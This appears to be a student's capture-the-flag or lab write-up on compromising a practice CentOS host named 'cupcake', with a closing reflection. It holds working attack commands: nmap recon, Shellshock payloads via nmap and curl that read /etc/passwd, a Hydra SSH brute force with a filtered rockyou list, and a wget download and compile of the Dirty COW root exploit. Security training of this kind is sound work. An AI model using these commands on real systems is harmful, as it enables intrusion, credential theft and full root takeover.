This page contains notes & reflection for exploiting "cupcake"

Notes

First I used the following general nmap scan against the top 100 ports to get a list of open ports on the host "cupcake" (10.0.5.23):

• sudo nmap 10.0.5.23 --top-ports 100

(NOTE: Explanations of the nmap commands given on this page are contained in Dedicated NMAP commands and techniques page

This gave me 2 open ports (22,80) that were attached to 2 services (ssh,http), with this knowledge I then used the following command to conduct a focused version scan against the target:

• sudo nmap 10.0.5.23 -p 22,80 -A
  

I then looked at the webserver, "http://10.0.5.23", and found this linked to a "Server Status Report" located at "/cgi-bin/status" (THIS IS VERY IMPORTANT FOR LATER). I also invoked a error on the webpage, which gave me information about the OS (CentOS).

Afterwards I did some digging with the OpenSSH version, since every version of a Linux OS I have used has OpenSSH installed by default. Using "rpm.pbone.net" I found that this release of OpenSSH is meant for "CentOS 6":

Credit: http://rpm.pbone.net/info_idpl_25010169_distro_centos_6_com_openssh-5.3p1-94.el6.x86_64.rpm.html

With this initial recon I gathered the following important information about cupcake:

• Ports 22 (SSH) and port 80 (HTTP) are open and running services
• • The webserver on port 80 is Apache version 2.2.15 and port 22 SSH service is OpenSSH 5.3
• The hostname: cupcake
• What OS it is running on: CentOS 6

I then ran another scan and converted it to a csv format with the following command:

• sudo nmap 10.0.5.23 -sT -A --top-ports 100 -Pn -oG top100ports.txt && nmaptocsv -i top100ports.txt -d ","
• • Tell nmap to perform a connect scan,-sT, while conduction verbose service detection, -A, on the top 100 well known ports, --top-ports 100, while skiping host discovery, -Pn, and exporting to a grepable format, -oG top100ports.txt, AND take that grepable file and input, -i, it into nmaptocsv with the delimiter of a comma, -d ",". This in result with a csv ready formatted scan printed to the console.

I then took that output and copied it into a Google sheets file, and made sure to split the text into columns. This created a nicely formatted sheets file.

With this initial recon finished, I then went online and used the versions of services, particularly the Apache webserver, and found multiple potential remote vulnerabilities. The “cgi-bin” directory on the web server indicates CGI (Common Gateway Interface) is enabled since it is the default script directory for CGI scripts, so the Shellshock vulnerability could be used.

I exploited this vunerabilty in two different ways:

Way 1: NMAP
Example:

• sudo nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd="echo ; echo ; /bin/uname -r" 10.0.5.23

Tips and tricks:

• When executing code, do it after the 2 echos
• When executing a command, ensure you are using the path to the command itself, for example uname is "/usr/bin/uname" on kali (use the which command to find its path, no "/usr")
• The command, /bin/uname -r, and IP could be changed for a different scenario

Way 2: CURL
Example:

• curl -H 'User-agent: () { ;: };echo ; echo ; /bin/cat /etc/passwd-' bash -s :'' http://10.0.5.23/cgi-bin/cgi-bin/status

Tips and tricks:

• When executing code, do it after the 2 echos
• When executing a command, ensure you are using the path to the command itself, for example uname is "/usr/bin/uname" on kali (use the which command to find its path, **no "/usr" **)
• The command, /bin/cat /etc/passwd, IP, and .cgi script could be changed for a different scenario

Then I used the password list contained in "/usr/share/wordlists/rockyou.txt.gz" to assemble a list of likely passwords based on cupcakes "/etc/passwd" * (see above in "Way 2", specifically the "samwise" user) with the command:

• cat rockyou.txt | grep -i samwise >> samwiselikeypasswds.txt
  

Notes about command:

• The "-i" flag for grep indicates a case-insensitive search
• Had a hint about what wordlist to use "rockyou.txt", and about how many passwords I should have (28.)
• • Using the grep commands "-c" flag displays how many matches you have received, helpful with password hints :)

I then took my password list and used the Hydra tool to test all the passwords in "samwiselikeypasswds.txt" with the command:

• hydra -l samwise -P samwiselikeypasswds.txt 10.0.5.23 -t 4 ssh

Which resulted in me getting the samwise password/into cupcake and capturing the user-flag!!!

NOTE: I had to add the following lines to "~/.ssh/config"

HostkeyAlgorithms +ssh-rsa
PubkeyAcceptedAlgorithms +ssh-rsa

Once I had gained this access, I then wanted to get root access to cupcake. First I used the searchsploit command to find exploits for the Linux kernel version, 2.6, with the command:

• searchsploit Linux Kernel 2.6

Then I downloaded one of the exploits, found here, with the command:

• searchsploit -m 40839

NOTE: This exploit was recommended by the professor

I then hosted a local webserver with python (in the folder with the downloaded .c file) on my kali box with the command (MAKE RANDOM PORT HIGH TO NOT CONFUSE WITH ANYTHING):

• python3 -m http.server {RANDOM_PORT}

Which I then could, while logged into samwise on cupcake, download my exploit from my webserver with the command:

• wget http://10.0.99.34:{RANDOM_PORT}/40839.c

On cupcake, since it has gcc, I could compile my exploit with the command (-lpthread and -lcrypt are linking a library):

• gcc 40839.c -o cow -lpthread -lcrypt

I then ran the newly created "cow" file, ./cow, which allowed me to create a new user password for the new root user "firefart", thereby granting me root (I then restored my .bak file created during the process :)).

Reflection

• Work on improving exploit research
• • Need to learn how to better integrate the information I am gathering for exploits. Also, keep in mind that I can create VMs of targets for testing vulnerabilities (for later.)
• • Learn how to use/better use ``searchsploit```
• • Maybe keep a directory of "working" exploits that I use throughout the course?!?
• Work on note taking
• • Did good note taking for details throughout this engagement, but I should keep a spreadsheet open to jot down information (OS, what non-default users exist, IPs, services, etc.)
• Learn more about Shellshock
• • Seems like a very powerful exploit that I should know a bit more about/learn how the two ways that were executed in class work on a less superficial way.
• Research more remote code execution vulnerabilities
• • Research how the 2 methods we used in class work (beyond just changing for a command.)

Sources:

• https://antonyt.com/blog/2020-03-27/exploiting-cgi-scripts-with-shellshock

• https://man7.org/linux/man-pages/man1/grep.1.html

• https://www.surevine.com/shellshocked-a-quick-demo-of-how-easy-it-is-to-exploit/

• https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/cgi

• https://en.wikipedia.org/wiki/Shellshock_(software_bug)

• https://antonyt.com/blog/2020-03-27/exploiting-cgi-scripts-with-shellshock